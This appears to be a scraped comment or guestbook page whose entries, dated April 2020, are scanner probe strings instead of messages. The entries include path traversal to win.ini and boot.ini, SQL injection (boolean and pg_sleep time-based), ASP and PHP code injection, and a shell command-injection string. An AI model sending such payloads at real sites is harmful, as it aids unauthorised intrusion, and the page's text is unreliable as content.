\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:16
../../../../../../../../../../windows/win.ini%00.jpg
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:17
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:19
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:22
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:22
-1" OR 2+97-97-1=0+0+0+1 --
response.write(9499705*9680591)
response.write(9499705*9680591) Tuesday, April 07, 2020 03:28
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:34
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:46
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:46
../../../../../../../../../../windows/win.ini
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:46
../../../../../../../../../../boot.ini
response.write(9457468*9012458)
response.write(9457468*9012458) Tuesday, April 07, 2020 03:51
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:52
${@print(md5(acunetix_wvs_security_test))}\
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:52
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:57
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:57
set|set&set
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:57
-1' OR 2+884-884-1=0+0+0+1 or 'ZJ4nu5YH'='
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:57
-1;select pg_sleep(16); --